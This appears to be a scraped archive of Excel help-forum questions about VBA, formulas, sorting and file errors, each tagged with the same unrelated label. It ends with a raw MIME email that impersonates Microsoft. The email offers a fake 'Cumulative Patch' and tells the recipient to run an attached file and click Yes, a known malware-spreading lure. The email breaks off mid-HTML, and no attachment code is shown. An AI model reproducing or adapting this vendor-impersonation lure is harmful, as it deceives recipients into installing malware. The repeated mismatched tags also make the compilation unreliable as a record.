Can't create ActiveX object
Hello,
I have a service built in VB that uses an excel activeX compoenet to create
excel reports from data reported to it from MSSQL by fireing stored
procedures.
For some reason right now the service keeps reporting that it cannot create
the ActiveX object. Has anyone seen this problem and what could be the
cause.
Shawn Tag: Saving a file opened via a hyperlink Tag: 22449
ActiveX can't create Object problem
Hello,
I have a service built in VB that uses an excel activeX compoenet to create
excel reports from data reported to it from MSSQL by fireing stored
procedures.
For some reason right now the service keeps reporting that it cannot create
the ActiveX object. Has anyone seen this problem and what could be the
cause.
Shawn Tag: Saving a file opened via a hyperlink Tag: 22447
File Format is not valid
I have an Excel SpreadSheet that was created last November which for some
reason we can no longer open. I have tried to restore from backup all the
way back into November but get the same error:
File Format is not valid
We had been able to get into the file up until recently. Thanks for the
help. Tag: Saving a file opened via a hyperlink Tag: 22446
Message: "No more new font available.."
On an Excel sheet I needed to create a lot charts with the
same format but different data. I created one chart and
formated the way I wanted, then copied and pasted the
chart, then changed the data source.
It worked well at the beginning, but later it complained
saying "No more new font available..." then the program
quits.
Anybody knows what the problem is and how to solve the
problem?
Thank you!
- Shiji Tag: Saving a file opened via a hyperlink Tag: 22443
Workbook Close Command
I need to "clean up" each sheet in the spreadsheet before it is saved. I am
using the routine which was suggested on this site. I am getting error when
trying to unhide rows and columns. The rows and columns might not be hidden
in the first place. Just in case that someone hid any row or columns I want
to unhide them for the next user. I need to fix the syntax, please:
Dim wks As Worksheet
Option Explicit
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As
Boolean)
For Each wks In ActiveWorkbook.Worksheets
With wks
.Unprotect
Cells.Select
Selection.EntireRow.Hidden = False
Selection.EntireColumn.Hidden = False
Range("B2").Select
.AutoFilterMode = False
Application.Goto reference:=.Range("A1"), Scroll:=True
.Range("a3").Select
.Protect
End With
Next wks
Sheets("sheet1").Select 'Goes to first sheet
Range("a3").Select
End Sub
Thanks
Jan Tag: Saving a file opened via a hyperlink Tag: 22442
Adding a Text Box
Does anyone know how to add a text box to an Excel Document?
I don't have a clue as to how to begin so if you could be descriptive,
that would be helpful.
I want someone to put in a value to the box, hit 'enter', and then have
the results of their value come up ...almost like a query...
Thanks
------------------------------------------------
~~ Message posted from http://www.ExcelTip.com/
~~View and post usenet messages directly from http://www.ExcelForum.com/ Tag: Saving a file opened via a hyperlink Tag: 22437
Intrastat reporting
Hi Guys
I've been lumbered with having to create an IntraStat report in Excel from
an SQL db that isn't really geared up for IntraStat hence the Excel querying
bit.
Anybody done anything like this, esp for Netherlands CBS?
Thanks
Laphan Tag: Saving a file opened via a hyperlink Tag: 22435
Excel / VBA / SQL DB
Anybody done any work with Excel / VBA / SQL DB?
Can you give me some pointers on how I could do the following all in one VBA
routine:
1) From a cell variable value (ie, user enters a customer code), I query
table A and put the data into a worksheet starting from say cell A1.
2) A blank row is created after the last data line in point 1 above.
3) Using the same cell variable, query table B and put the data into the
worksheet starting from the row after the blank row in point 2 above.
and so on.
Like I've said before I work with ASP all day and know about ADO
connections, commands and recordsets, so is it something similar to this??
Man thanks.
Rgds
Laphan Tag: Saving a file opened via a hyperlink Tag: 22434
percentages...
If I want to make a spreadsheet with the number of times a player has turned
out for his team in a season, what is the formula to put in the cell. For
example, John Philips has made 15 appearances out of a possible 22. I do not
want to put in the formula sum=15/22*100 as I wish to simply tupe 15 in the
cell and get it to change the cells contents to 68%. I know how to get it to
put this figure into another cell, but how do I get it to do it in the same
cell as the info I type. Is this possible?
Secondly, if I have the said mr.Philip' percentages for the last say eight
years, how can I get it to give an accurate average when the player didn't
play for the team for 3 years because of other commitments. Again to example
this, the player made say 62%,23%,0,0,0,78%,88%,100%. I only want an average
for his playing years, but don't want to divide by 5 as I wish to drag this
formula down the whole team, some of whom have played more years and some
less. Is there a formula which will ignore the zeros?
Thanks for help in advance....
Dave Tag: Saving a file opened via a hyperlink Tag: 22433
Sorting and the word The
Hiya
Does anyone know a way of sorting a list (of CD's or films) where the word
The wouldn't be included, so The Beatles would be under B, not T ?
I don't want to have to delete all the The's, so it will still say The
Beatles ?
TIA
Dave Tag: Saving a file opened via a hyperlink Tag: 22428
Analysis32?
Hello,
When I open Excel (Office XP with Windows 98SE), I get a message that
"C:\Program Files\Microsoft Office\Office10\Library\Analysis\analysis32.xl
could not be found." I'm not looking for it! Why do I keep getting this
message, and how can I make it go away? I seem to recall getting a message
about a different file awhile ago, and I think I had to go into the registry
to fix it, but I'm not sure what to do with this one. Thank you. Tag: Saving a file opened via a hyperlink Tag: 22425
Help! Sorting problem
I need to sort a list of alphanumeric values in excel using the numeric part
of the value only. All the values have the format AB123456C but I need the
whole value to show after the sort, not just the numeric part.
Can this be done?
Alistair Tag: Saving a file opened via a hyperlink Tag: 22421
Excel VBA Macro Catch 22
Hi Folks,
This has got me tearing my hair out. [What's left of it....;-) ]
I have an Excel macro that copies data from one workbook to another 'history'
one. The relevant bit of the code is:-
' Open Standard Weekly Book & Copy Weekly Sheet
Workbooks("whcasht.xls").Worksheets("Weekly Sheet").Activate
ActiveSheet.Cells.Select
Application.CutCopyMode = False
Selection.Copy
' Open Backup Workbook & Paste Weekly Sheet
Workbooks(FileDateX).Worksheets("Sheet1").Activate
ActiveSheet.Paste
This works every time.
Sometimes, it is necessary to bring back the 'history' workbook and add to the
data. I thought I'd use the same code (with the workbook names changed!) to
get the data back. This results in a 1004 runtime error. 'The information
cannot be pasted because the Copy area and the Paste area are not the same
size & shape.'
So I tried this:-
' Open Backup Weekly Sheet & Copy Weekly Sheet
Workbooks(WeeklySheetName).Worksheets("Sheet1").Activate
ActiveSheet.Cells.Range("A1:K81").Select
Application.CutCopyMode = False
Selection.Copy
' Open WhCasht Spreadsheet & Paste Backup Weekly Sheet
Workbooks("Whcasht.xls").Worksheets("Weekly Sheet").Activate
ActiveSheet.Cells.Range("A1:K81").Select
Selection.Paste
This results in a 438 runtime error on the the Selection .Paste statement.
'Object doesn't support this property or method.'
Any ideas?
TIA
--
John Thow
an optimist is a guy/ that has never had/ much experience -
certain maxims of archie; Don Marquis.
To e-mail me, replace the DOTs in the Reply-To: address with dots! Tag: Saving a file opened via a hyperlink Tag: 22420
Finding missing numbers from a list
I'm using Excel 2000.
I have a list of number, from 0000 to 1000, sorted from smallest to
largest.
But the list is not complete, there are gaps in the number sequence, eg:
0000
0025
0026
0027
0028
0045
etc.
Whats the easiest way to create another list of the missing numbers? EG,
using the example above
0001
0002
0003
etc.
Very many thanks. Tag: Saving a file opened via a hyperlink Tag: 22406
Button control to run a macro?
I am sure there is some way of doing this, but the "Help" feature has the
solution pretty well hidden . . .
I am trying to create a spreadsheet with a button control that will "show
all" lines once the user has finished using a line selected by using a
filter.
I know how to add a button, I know how to record a macro, I just can't
figure out how to run the macro when the button control is clicked. Any
Help?
Thanks,
Dick Prenovost Tag: Saving a file opened via a hyperlink Tag: 22401
DDEExecute
I am using DDE from MSAccess for sending commands to Excel.
I used the DDEExecute var_CHNL_no, "[page.setup(". Where can I find
the documentation for the rest of the commands Excel accepts with DDE
(like creating new worksheet, charts etc) ? Tag: Saving a file opened via a hyperlink Tag: 22399
Shortcuts of excel
I want to perform a "horizontally page down" , switch from column 1 to
column 50 .
are there any shortcut keys perform such action?
are there any article listing all the shortcut key of excel?
thank you. Tag: Saving a file opened via a hyperlink Tag: 22391
Linking Cells: Excel into Word Document
Greetings,
After reading through the help files for Excel 2002, it seems to me that
there is no way, except for programming, to have just a range of cells in a
worksheet be linked to a Word document.
Here is what I am attemping to accomplish: Using Word to create an extensive
document for a database proposal. Using Excel to document the all of the
required tables (since nothing has been created in Acces and I am new
databases), drawing diagrams with lines and other database objects. Would
like to be able to insert/link certain cells from a worksheet (which would
be many inserts/links) into the Word document.
Any suggestions?
Thanks,
Eric Tag: Saving a file opened via a hyperlink Tag: 22386
pasting numbers into excel
when pasting numbers from another program into excel, i have problem
with the excel program understanding that these values are numbers
even if i go into format cells and change the format, they dont change
eg. if i change a cell to currency, that pasted cell still doesn
change.
however, if i go to the cell and hit f2 and then enter, or i jus
retype the number in over the top, then all of a sudden it works, and
can use the data for charts etc.
but ive been trying to use these numbers in a chart as is, and it won
plot the number with any value. as soon as i retype the number over th
top of it, it plots the value fine.
i have tried rightclicking and pasting special, the only 3 options
get are paste as html, text , or unicode... and all 3 dont work.
i found this problem out because i can download my pohne bill off th
net, and also at work im downloading reports off various programs an
its the same story. the nubmers just dont seem to mean anything until
retype the number.
please help somebody?
thankyou
-----------------------------------------------
~~ Message posted from http://www.ExcelTip.com
~~View and post usenet messages directly from http://www.ExcelForum.com Tag: Saving a file opened via a hyperlink Tag: 22385
cannot open excel file
I have an excel file that originated in excel 97. I opened it up in excel
2002. I emailed it to a few people and some can open it and some can't.
One person that can't open it has excel 97. the Save as Type: is Microsoft
Excel 97-2002 &5.0 /95 Workbook (*.xls). Any ideas as to why he cannot
open the file. The icon next to the file isn't an excel file. Tag: Saving a file opened via a hyperlink Tag: 22374
formatting text/numbers
I have entries in a column that are listed as a "credit" (ie. $1234CR). I
want to reformat these entries as -$1234 so that calculations can be done
correctly. Any ideas?
What about TRIM and multiply by -1? Tag: Saving a file opened via a hyperlink Tag: 22371
Excel - Paste Special Values Question
Ok......I need some help. I am using Office XP, service pak 2.
In Excel, I highlight information, right click and select copy. If
go to another sheet in the same workbook and right click and selec
Paste Special values, I get the the Paste Special Values Menu.
[image: http://www.mrexcel.com/mec000526a.gif]
If I go to a new workbook, right click and select Paste Special Values
I get a differen't Paste Special Values screen. On the new screen,
have tried each option and nothing works.
[image: http://excelhelp.freeservers.com/special_values_error.gif]
Any ideas on why it is doing this? Is there a setting?
Thanks in advance,
Quanch
-----------------------------------------------
~~ Message posted from http://www.ExcelTip.com
~~View and post usenet messages directly from http://www.ExcelForum.com Tag: Saving a file opened via a hyperlink Tag: 22367
Counting populated rows in excel
I have some rows populated in an excel sheet. Is there a way I can writ
a macro to count the number of populated rows
-----------------------------------------------
~~ Message posted from http://www.ExcelTip.com
~~View and post usenet messages directly from http://www.ExcelForum.com Tag: Saving a file opened via a hyperlink Tag: 22366
excel2002
Hi all
Sorry if this has been covered before: Is there any way to make an excel
workbook always open on the same worksheet immaterial of where you actually
saved or closed the workbook?
Many thanks
elwyn Tag: Saving a file opened via a hyperlink Tag: 22360
Disable Clipboard
Hello. Using Excel 2002, how can I disable the clipboard to keep popping up
when I copy a cell?
Un-check the 'Show Clipboard Automatically' option but still opens everytime
I make a copy.
Better yet, is there a way to uninstall that feature at all?
Thank you very much. Tag: Saving a file opened via a hyperlink Tag: 22359
Time * Rate of pay
I'm trying to use excel as a paycheck calculator. So far, I have star
time, finish time, finish - start time to calculate hours, but I can'
seem to multiply a time and a dollar value. Can someone please help m
with this
-----------------------------------------------
~~ Message posted from http://www.ExcelTip.com
~~View and post usenet messages directly from http://www.ExcelForum.com Tag: Saving a file opened via a hyperlink Tag: 22348
hlookup, same dates in row I'm looking up from
Hello all,
First, thanks to all for making this such a worthwhile resource. I
feel humbled whenever I have to post a question and I get such
thought-out responses.
Here's my latest scenario. I have 23 sheets. In one sheet, I enter
purchase orders. Each Item that is being ordered has its own sheet
where certain information (order date, number, arrival and quantity)
from those purchase orders is automatically updated and further
tracked.
Purchase Order Entry Sheet
PO Date 9/12/03 11/20/03 11/20/03 12/14/03
PO Number 123 234 345 456
PO Est. Arrival 9/30/03 11/30/03 12/5/03 12/30/03
Item 1 45 100
Item 2 222
Item 3 11 18
Item 4 24
Each Item has a sheet. I have HLookups looking at the PO Date on the
PO Entry Sheet and filling in how many items were ordered. The problem
comes when I have two orders with the same date (see 11/20). Only one
of those orders is picked up by the HLookup. I need it to find both so
that all orders are accounted for on the Item sheets. In my example
above, I would have four Item sheets, but only (in my situation) is
the 2nd order on 11/20 recorded in the item sheets. Item_1 and Item_2
orders for 11/20 are not being picked up.
This is very difficult to explain. I hope I've made sense. I'm using
Excel 2002.
Please let me know if you need more information. Thank you one and
all!
Christine Flott Tag: Saving a file opened via a hyperlink Tag: 22310
Copy formulaS between Workbooks
This might be some sort of follow up question from Ken Runge post "Cop
formula between Workbooks" from Oct-23-2003. I would like to copy som
formulas from one workbook to another without getting a reference t
the original workbook
-----------------------------------------------
~~ Message posted from http://www.ExcelTip.com
~~View and post usenet messages directly from http://www.ExcelForum.com Tag: Saving a file opened via a hyperlink Tag: 22309
Error Opening a File
Hi,
I am trying to open a existing text file to write some
text,but the Existing Text file is already open.
So I can't write anything using VBA Macro for Excel 2000.
I am getting error while Opening the Text file.
Is it possible for any one to guide how to handle this
Error ??
I am using following code.
here fileName is already open in some other applicaiton.
Open fileName For Output Access Write As #fileNumber
How to handle this Error . I want to display an error
message saying that The file is already open ..
Thanks
Mili. Tag: Saving a file opened via a hyperlink Tag: 22307
Error Opening a File
Hi,
I am trying to open a existing text file to write some
text,but the Existing Text file is already open.
So I can't write anything using VBA Macro for Excel 2000.
I am getting error while Opening the Text file.
Is it possible for any one to guide how to handle this
Error ??
I am using following code.
here fileName is already open in some other applicaiton.
Open fileName For Output Access Write As #fileNumber
How to handle this Error . I want to display an error
message saying that The file is already open ..
Thanks
Mili. Tag: Saving a file opened via a hyperlink Tag: 22306
Custom Menus
Hello,
Does anyone know if it's possible to share custom menus.
My company run a NT network and everyone uses Excel. I want to create a
custom menu in excel which is managed centrally.
Anyone got any suggestions?
I do not check my allanmartin@ntlworld.com account. I only use it for New
Groups and I ignore it as it has been harvested too many times.
Please respond to the newsgroup and I will check it daily.
Many thanks.
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.538 / Virus Database: 333 - Release Date: 10/11/2003 Tag: Saving a file opened via a hyperlink Tag: 22302
.XLS > .HTML
Hi,
I have some Excel workbooks I'd like to prepare for web viewing.
However, the built in publish to web feature in Excel 2002 (XP) never gives
the graphs, AutoShapes or WordArt from the original file. MHTML archive
format gives a file bigger than the original, which would take quite some
time to download over a dialup connection.
I've heard the latest version of Office works better in terms of getting my
files onto the web, is there any truth in that?
Thanks
Dylan
ps. If there are any glitches in the code produced I can correct them as I
have Dreamweaver on the same system. Tag: Saving a file opened via a hyperlink Tag: 22299
Row Numbers
Hi,
If I delete a row in excel i.e. row 7 then the row numbers go out of sync
i.e.
5
6
8
9
etc
is it possible to correct this?
Thanks for your help Tag: Saving a file opened via a hyperlink Tag: 22294
Displaying a + sign on positive numbers
I am calculating the percentage increase / decrease on two numbers. If the
difference results in a decrease of, say 2.2% it is displayed as -2.2%
If the result is an increase of 2.2%, then 2.2% is displayed. Purely for
formatting reasons, I wish to display the figure as +2.2%
How can I set this up so that positive numbers contain a plus sign, whilst
maintaining the cell as a number? I can carry out an IF statement that will
add a "+" to the figure if it's greater than zero, but this ignores any
formatting to a set number of decimal places.
Any help will be appreciated! Tag: Saving a file opened via a hyperlink Tag: 22290
XLXP: Text cut-off at end?
Hi,
Pls. download the attached MSEXcel File.
Look at point # 16, the "aaaaa's" at the end are cut-off.
Pls. can you advise me why this is & how I can fix this problem.
Thanks
+----------------------------------------------------------------
| Attachment filename: test_file.xls
|Download attachment: http://www.excelforum.com/attachment.php?postid=355002
+----------------------------------------------------------------
-----------------------------------------------
~~ Message posted from http://www.ExcelTip.com
~~View and post usenet messages directly from http://www.ExcelForum.com Tag: Saving a file opened via a hyperlink Tag: 22285
Calculations in Excel
Hi every1!
If u can, plz help me with this excel question (its been bothering me
for ageas already!):
Total Available: 25
Runout date: ???
A B
Date Quantity Required
1/6/2003 6
3/7/2003 14
4/8/2003 9
8/11/2003 6
How do i make it show the date that the food runs out on (4/8/2003 in
this case) and the day before it will run out (3/7/2003 in this case)?
If u can help, then plz reply!!
Thx in advance
------------------------------------------------
~~ Message posted from http://www.ExcelTip.com/
~~View and post usenet messages directly from http://www.ExcelForum.com/ Tag: Saving a file opened via a hyperlink Tag: 22284
Please help
Hi,
Once again I need your help guys,
Ive got to colums of data :
3 4
5 7
5 8
6 9
etc. etc.
I want to set up a formula that determites if A and B are inside some
different ranges, and
thereby set C to a value. I tried with IF but i got 12 sets of ranges...
Is it possible to do in a matrix ?
Best regards,
Sauer Tag: Saving a file opened via a hyperlink Tag: 22268
Selecting First AutoFilter Row
How do I select the first filter row of an autofiltered range?
I tried going to the top of the range and doing an offset:
range("E1").Activate
ActiveCell.Offset(1, 0).Activate
but that did not work.
If E1 was the header row and E150 was the first filtered row, this code
above would activate E2. Tag: Saving a file opened via a hyperlink Tag: 22266
excel 2003 - navigating regions
i am going through the "inside out" book for excel 2003 and need help
in figuring out why i can't navigate regions as described in the book.
- i open the regional sales.xls file (that is shipped with the book)
and select a cell (say a4)
- click ctrl+right arrow ... expect to get to the next active cell
(b4) but the worksheet scrolls to the right but no change in
selection. doesn't seem to matter what document i open
very strange Tag: Saving a file opened via a hyperlink Tag: 22265
Pivot Table -- Don't want first column sorted at all
I have created a pivot table with totals for 20 years, one in each column.
The data in the source table appears in a certain order, WHICH I'D LIKE
PRESERVED in the pivot table.
The pivot table, however, wants to sort things alpha or something. That
is bad. I don't want that.
How do I have it NOT sort the categories down the first column?
Thanks.
Rob Miller
Oakland CA Tag: Saving a file opened via a hyperlink Tag: 22262
printing of columns HELP
hi there
i am sure this is a simple question
I have a list of names and phones (column A and B) I would like to
print several columns to fill the page (i.e. just how a phone book
looks
how do I do this)
------------------------------------------------
~~ Message posted from http://www.ExcelTip.com/
~~View and post usenet messages directly from http://www.ExcelForum.com/ Tag: Saving a file opened via a hyperlink Tag: 22259
See these internet package that comes from the MS
--bdykpufypmuz
Content-Type: multipart/related; boundary="asmrzpbmyzj";
type="multipart/alternative"
--asmrzpbmyzj
Content-Type: multipart/alternative; boundary="lklthdvgxutap"
--lklthdvgxutap
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
MS Customer
this is the latest version of security update, the
"November 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three newly discovered vulnerabilities.
Install now to protect your computer
from these vulnerabilities, the most serious of which could
allow an attacker to run code on your system.
This update includes the functionality =
of all previously released patches.
System requirements: Windows 95/98/Me/2000/NT/XP
This update applies to:
- MS Internet Explorer, version 4.01 and later
- MS Outlook, version 8.00 and later
- MS Outlook Express, version 4.01 and later
Recommendation: Customers should install the patch =
at the earliest opportunity.
How to install: Run attached file. Choose Yes on displayed dialog box.
How to use: You don't need to do anything after installing this item.
Microsoft Product Support Services and Knowledge Base articles =
can be found on the Microsoft Technical Support web site.
http://support.microsoft.com/
For security-related information about Microsoft products, please =
visit the Microsoft Security Advisor web site
http://www.microsoft.com/security/
Thank you for using Microsoft products.
Please do not reply to this message.
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.
----------------------------------------------
The names of the actual companies and products mentioned =
herein are the trademarks of their respective owners.
Copyright 2003 Microsoft Corporation.
--lklthdvgxutap
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
<style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none}
</style>
</HEAD>
<BODY BGCOLOR=3D"White" TEXT=3D"Black">
<BASEFONT SIZE=3D"2" face=3D"verdana,arial">
<TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB">
<TR height=3D"20">
<TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">
<FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/"
TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A>
</B></I></FONT>
</TD>
<TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>
<FONT color=3D"#ffffff" size=3D1>
<A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' =
target=3D"_top">All Products</A> |
<A class=3D'navtext' href=3D'http://support.microsoft.com/' =
target=3D"_top">Support</A> |
<A class=3D'navtext' href=3D'http://search.microsoft.com/' =
target=3D"_top">Search</A> |
<A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top>
Microsoft.com Guide</A>
</FONT>
</TD>
</TR>
<TR>
<TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP>
<FONT FACE=3D"Verdana, Arial" SIZE=3D1><B>
<A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top">
Microsoft Home</A> </B>
</FONT>
</TD>
</TR>
</TABLE>
<IMG SRC=3D"cid:qlhgtss" BORDER=3D"0"><BR><BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
MS Customer<BR><BR>
this is the latest version of security update, the
"November 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three newly discovered vulnerabilities.
Install now to protect your computer
from these vulnerabilities, the most serious of which could
allow an attacker to run code on your system.
This update includes the functionality =
of all previously released patches.
</FONT></TD></TR>
</TABLE>
<BR><BR>
<TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600">
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fdbfrbq" =
ALIGN=3D"absmiddle" BORDER=3D"0"> System requirements</B>
</FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fdbfrbq" =
ALIGN=3D"absmiddle" BORDER=3D"0"> This update applies to</B>
</FONT></TD><TD NOWRAP>
<FONT SIZE=3D"1">
MS Internet Explorer, version 4.01 and later<BR>
MS Outlook, version 8.00 and later<BR>
MS Outlook Express, version 4.01 and later
</FONT>
</TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fdbfrbq" =
ALIGN=3D"absmiddle" BORDER=3D"0"> Recommendation</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch =
at the earliest opportunity.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fdbfrbq" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to install</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Run attached